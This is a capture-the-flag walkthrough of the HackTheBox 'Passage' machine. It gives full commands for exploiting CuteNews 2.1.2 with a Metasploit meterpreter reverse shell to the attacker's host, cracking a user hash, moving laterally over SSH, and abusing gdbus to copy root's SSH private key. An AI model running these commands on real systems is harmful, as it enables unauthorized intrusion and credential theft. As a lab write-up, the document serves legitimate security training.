Passage HackTheBox WalkThrough
This is Passage HackTheBox machine walkthrough. In this writeup, I have demonstrated step by step how I rooted to Passage HTB machine. Before starting let us know something about this machine. It is Linux
box with IP address 10.10.10.206
and security level medium
assigned by its maker.
First of all, connect your local machine with VPN so that you can access to the lab machines and confirm the connectivity of passage machine by pinging the IP address 10.10.10.206. If all correct then start hacking.
As usual, I began by scanning the IP address so that I could get some starting points. Used nmap
for this task and the result is below.
Scanning
$ nmap -sC -sV -oN passage_scan 10.10.10.206
Nmap revealed that port 22
and 80
is open. SSH server
is running over port 22 and apache2
web server is running over port 80. As apache web server is running over port 80 so there must be some website hosted on this machine IP. Ongoing to URL http://10.10.10.206/ found a webpage showing Passage News
.
Scrolling to the bottom got information Powered by : CuteNews
. Then immediately googled about CuteNews
and found that it is an Open Source Content Management System
(CMS) for hosting news articles. Since, it is a CMS then there must be some user(s) who write blog post on this website. After spending sometimes got two email address [email protected]
& [email protected]
.
So we have two users namely paul
and nadav
extracted from their emails. Added them to my notes. And proceeded for further enumeration. Checked the page-source
by pressing CTRL+U
and found URL http://10.10.10.206/CuteNews that is the installation folder of CuteNews. Ongoing to this page found register
& login
options and version of running CuteNews
is 2.1.2
.
As I get some information about any software or CMS then I immediately search for public exploits for that software. So used $searchsploit
[a CLI tool to query exploit-db database] for searching exploit of CuteNews 2.1.2.
Searching Public Exploit
$ searchsploit CuteNews 2.1.2
There is a Remote Code Execution exploit
for CuteNews 2.1.2
and it also has metasploit module
. So launched metasploit to exploit this vulnerability. But, when searched for CuteNews in metasploit gave message No results found from search
.
Since this module is not present in metasploit-framework so, we have to explicitly, download and add this exploit to our metasploit-framework. The exploit link is https://www.exploit-db.com/download/46698 . Followed the below steps to integrate the module in metasploit.
$msfdb run
msf5 > search cutenews
msf5 > wget 'https://www.exploit-db.com/download/46698'
msf5 > mv 46698 /usr/share/metasploit-framework/modules/exploits/unix/webapp/cutenews_avatar_rce.rb
We have to add comma [,] to this exploit because there is a syntax error in it, see this issue at rapid7 repo.
msf5 > vi /usr/share/metasploit-framework/modules/exploits/unix/webapp/cutenews_avatar_rce.rb
After adding the exploit and making changes we have to reload all modules.
msf5 > reload_all
msf5 > search cutenews
Now we have successfully added CuteNews RCE exploit to our metasploit-framework. After loading CuteNews module when used msf
command $show options
, to list available options, it also includes USERNAME
& PASSWORD
. So CuteNews 2.1.2 has actually an Authenticated RCE
vulnerability
because it requires username and password too. As we already have a register button at URL http://10.10.10.206/CuteNews so, registered a user by the name test1
& password test1
.
It is time to get meterpreter shell. Used the above credential to get shell.
Getting Shell
msf5 > use exploit/unix/webapp/cutenews_avatar_rce
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set RHOSTS 10.10.10.206
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set payload php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set LHOST 10.10.14.191
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set USERNAME test1
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set PASSWORD test1
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set VHOST 10.10.14.191
msf5 exploit(unix/webapp/cutenews_avatar_rce) > exploit
meterpreter > sysinfo
Note: If your meterpreter shell don’t work then background the shell and try to exploit again & again 3-4 times. Even if not works then use unstaged payload php/meterpreter_reverse_tcp instead of staged payload.
Got meterpreter shell. Upgraded the shell to fully qualified Linux shell so that I could run all linux command remotely.
Upgrading Shell
meterpreter > shell
~python -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm-256color
$ CTRL+Z
//to background the shell
$ stty raw -echo
$ fg
//plus two times enter to foreground the session
After some enumeration got a file named lines
inside directory /var/www/html/CuteNews/cdata/users/
. It contains information of all the users in base64 encoded
form. After decoding found SHA256 hash of user paul.
$ cat /var/www/html/CuteNews/cdata/users/lines
paul
: e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
Luckily, got the password from Crackstation for this hash.
So we have credential paul
: atlanta1
Switched the user to paul
using the password atlanta1
$ su paul
~atlanta1
Capture User Flag
$ cat user.txt
Privilege Escalation
After some initial enumeration found that authorized_keys file of user paul contains key of user nadav. It means user paul can connect to user nadav locally via SSH.
$ ssh nadav@localhost
Successfully logged in to nadav through SSH
. We are nadav now.
After some, more enumeration did not found any privilege escalation vector. So ran linpeas.sh
[a post exploitation enumeration script] for help and it found gdbus
could be used to escalate privilege. Did not know how to escalate privilege-using gdbus. So googled privilege escalation using gdbus
and got this first article.
According to this article, gdbus allows a user to overwrite arbitrary files on the file system, as root, with no password prompting. Or we can say any user can copy content of root user without any password. So I used this command to copy id_rsa key of root user
so that using this key I could SSH to root.
$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/key.txt true
$ cat /tmp/key.txt
We have got private key of user root. So copied this key inside the file root_key
on my local PC. And after changing the permission of file root_key to 600
connected to root using SSH.
$ vi root_key
$ chmod 600 root_key
$ ssh -i root_key [email protected]
root@passage:~# whoami && id
We have successfully escalated the privilege to root. Now we can capture root flag.
Capture Root Flag
$ cat root.txt
This is how I rooted to Passage HackTheBox. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. For any suggestion and query related to walkthrough, feel free to contact us at [email protected].
You can read walkthrough of similar machine from here.